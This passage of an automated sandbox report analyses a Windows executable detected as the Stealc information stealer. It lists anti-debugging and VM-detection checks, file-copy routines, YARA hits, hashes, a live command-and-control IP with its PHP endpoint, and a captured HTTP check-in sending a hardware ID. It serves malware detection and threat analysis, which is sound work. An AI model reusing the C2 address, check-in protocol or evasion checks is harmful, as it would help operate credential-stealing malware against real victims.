                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_001D38B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_001D4910
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_001CDA80
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_001CE430
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_001CED20
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_001D4570
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_001CDE10
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_001CBE70
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_001CF6B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_001D3EA0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_001C16D0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001C1160 GetSystemInfo,ExitProcess, 0_2_001C1160
                Source: file.exe, file.exe, 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarejBH
                Source: file.exe, 00000000.00000002.1747423410.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747423410.0000000000E97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13598
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13595
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13649
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13615
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13610
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001C45C0 VirtualProtect ?,00000004,00000100,00000000 0_2_001C45C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_001D9860
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001D9750 mov eax, dword ptr fs:[00000030h] 0_2_001D9750
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_001D7850
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: Process Memory Space: file.exe PID: 6792, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_001D9600
                Source: file.exe, file.exe, 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: BZProgram Manager
                Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_001D7B90
                Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001D6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_001D6920
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_001D7850
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001D7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_001D7A30

                Stealing of Sensitive Information

                Source: Yara match File source: 0.2.file.exe.1c0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.1705421415.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 6792, type: MEMORYSTR
                Source: Yara match File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match File source: 0.2.file.exe.1c0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.1705421415.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 6792, type: MEMORYSTR
                Source: Yara match File source: dump.pcap, type: PCAP

                MITRE ATT&CK Matrix (one line per tactic; the number the report attaches to a technique is given in parentheses)

                Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
                Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
                Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
                Execution: Command and Scripting Interpreter (2), Native API (11), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
                Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
                Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
                Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
                Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
                Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
                Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware |
http://185.215.113.37/ | 100% | URL Reputation | malware |
http://185.215.113.37 | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.phpk | 17% | Virustotal | | Browse
http://185.215.113.37/i | 17% | Virustotal | | Browse
http://185.215.113.37/( | 17% | Virustotal | | Browse
http://185.215.113.37/ws | 17% | Virustotal | | Browse
http://185.215.113.37/e2b1563c6670f193.php= | 17% | Virustotal | | Browse
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.php= | file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpk | file.exe, 00000000.00000002.1747423410.0000000000E63000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php? | file.exe, 00000000.00000002.1747423410.0000000000E63000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/( | file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/i | file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1747423410.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpa-7368302a1ad4 | file.exe, 00000000.00000002.1747423410.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1523774
                    Start date and time:2024-10-02 02:00:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 2m 45s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:1
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 80%
                    • Number of executed functions: 19
                    • Number of non-executed functions: 92
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated
                    No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                    No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                    No context
                    No context
                    No created / dropped files found
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.947078056996542
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'829'888 bytes
                    MD5:5cace3141ff06d98c584bfb6681a8ae3
                    SHA1:0993adfa0a320e79a33495bd92c2f457714cca95
                    SHA256:34e912b828576002110972ce8292a94d4ecebb1582816dcb1414ea2f334827aa
                    SHA512:199c0cfe737419829ba7ecc2ee68ca83fe1b042cb20d4f134be45d733a97483111d48f6845b18bb15963097503ef2524e9d1e0fa66e580ac8e7df1fb15b11394
                    SSDEEP:49152:UvjRiEOQx6/EYnSZMyIXDsP7n/SyzEGyOK4HKt:yRibQU/Pn4MyIzsPTlzEGjK4
                    TLSH:E38533FEE714216CD5EE4178CE7B47336BACE6058BD52D1317982EFC81A4A18B87B112
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                    Icon Hash:90cececece8e8eb0
                    Entrypoint:0xa97000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Programming Language:
                    • [C++] VS2010 build 30319
                    • [ASM] VS2010 build 30319
                    • [ C ] VS2010 build 30319
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | ce1ed224783d28a14ee001051e9a5272 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x29f000 | 0x200 | 91ceca0d1aa7ade50fae50d539092075 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
epsygglv | 0x4fd000 | 0x199000 | 0x198800 | 5094dc35b606e1c3d96babc0becc2292 | False | 0.9947550107099143 | data | 7.95332225365963 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ncsgechg | 0x696000 | 0x1000 | 0x600 | 12bc8e1d20c3a60015382fe6072f55ab | False | 0.5670572916666666 | data | 4.937401699613444 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x697000 | 0x3000 | 0x2200 | 4711238df17f1f1524eb484e6e4dc7ae | False | 0.08938419117647059 | DOS executable (COM) | 0.9675635496509017 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-02T02:01:04.104690+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 02:01:03.180196047 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 2, 2024 02:01:03.185216904 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 2, 2024 02:01:03.185298920 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 2, 2024 02:01:03.185663939 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 2, 2024 02:01:03.190577030 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 2, 2024 02:01:03.879561901 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 2, 2024 02:01:03.879806042 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 2, 2024 02:01:03.882147074 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 2, 2024 02:01:03.886959076 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 2, 2024 02:01:04.104403973 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 2, 2024 02:01:04.104690075 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 2, 2024 02:01:07.446368933 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                    • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 6792 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 02:01:03.185663939 CEST | 89 | OUT | GET / HTTP/1.1
                    Host: 185.215.113.37
                    Connection: Keep-Alive
                    Cache-Control: no-cache
Oct 2, 2024 02:01:03.879561901 CEST | 203 | IN | HTTP/1.1 200 OK
                    Date: Wed, 02 Oct 2024 00:01:03 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
Oct 2, 2024 02:01:03.882147074 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBK
                    Host: 185.215.113.37
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 42 45 41 37 34 30 37 41 36 46 31 33 35 30 38 32 37 30 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 2d 2d 0d 0a
Data Ascii:
------DBFHDBGIEBFIIDGCBFBK
Content-Disposition: form-data; name="hwid"

4BBEA7407A6F1350827015
------DBFHDBGIEBFIIDGCBFBK
Content-Disposition: form-data; name="build"

doma
------DBFHDBGIEBFIIDGCBFBK--
Oct 2, 2024 02:01:04.104403973 CEST | 210 | IN | HTTP/1.1 200 OK
                    Date: Wed, 02 Oct 2024 00:01:03 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 59 6d 78 76 59 32 73 3d
                    Data Ascii: YmxvY2s=
                    Target ID:0
                    Start time:20:00:59
                    Start date:01/10/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x1c0000
                    File size:1'829'888 bytes
                    MD5 hash:5CACE3141FF06D98C584BFB6681A8AE3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1705421415.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true
                      Execution Graph

                      Execution Coverage:8%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:9.7%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:24
